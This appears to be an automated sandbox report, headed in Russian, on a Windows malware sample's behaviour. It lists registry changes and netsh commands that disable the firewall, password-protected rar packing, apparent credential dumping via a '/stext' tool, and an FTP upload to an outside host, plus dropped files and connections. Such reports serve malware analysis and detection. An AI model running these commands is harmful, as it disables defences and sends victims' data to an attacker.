Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- %TEMP%\1.tmp\add.exe a 10.0.0.1@ 1_24_16.rar *.dll -psafahi@
- %TEMP%\1.tmp\add.exe c -zinfo 10.0.0.1@ 1_24_16.rar -k
- %TEMP%\1.tmp\add.exe x 1.exe *.bin -phicham@
- %TEMP%\1.tmp\web.bin /stext %USERNAME%.dll
- <SYSTEM32>\netsh.exe firewall set opmode disable
- <SYSTEM32>\ftp.exe -n -s:ftpcmd.dat ftp.toujours-amis.com
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\call.bat" "
- <SYSTEM32>\ipconfig.exe
- %TEMP%\1.tmp\web.bin
- %TEMP%\1.tmp\%USERNAME%.dll
- %TEMP%\1.tmp\1.bat
- %TEMP%\1.tmp\Texte.txt
- %TEMP%\1.tmp\__rar_00.250
- %TEMP%\1.tmp\ftpcmd.dat
- %TEMP%\1.tmp\ip.txt
- %TEMP%\1.tmp\10.0.0.1@
- %TEMP%\1.tmp\2.bat
- %TEMP%\1.tmp\add.exe
- %TEMP%\1.tmp\call.bat
- %TEMP%\1.tmp\1.exe
- %TEMP%\1.tmp\oeminfo.INI
- %TEMP%\1.tmp\web.exe
- %TEMP%\1.tmp\cc.bat
- %TEMP%\1.tmp\info
- %TEMP%\1.tmp\1.bat
- %TEMP%\1.tmp\add.exe
- %TEMP%\1.tmp\1.exe
- %TEMP%\1.tmp\ip.txt
- %TEMP%\1.tmp\web.bin
- %TEMP%\1.tmp\10.0.0.1@
- %TEMP%\1.tmp\%USERNAME%.dll
- %TEMP%\1.tmp\__rar_00.250 в %TEMP%\1.tmp\10.0.0.1@
- 'localhost':1040
- 'ft#.###jours-amis.com':21
- DNS ASK ft#.###jours-amis.com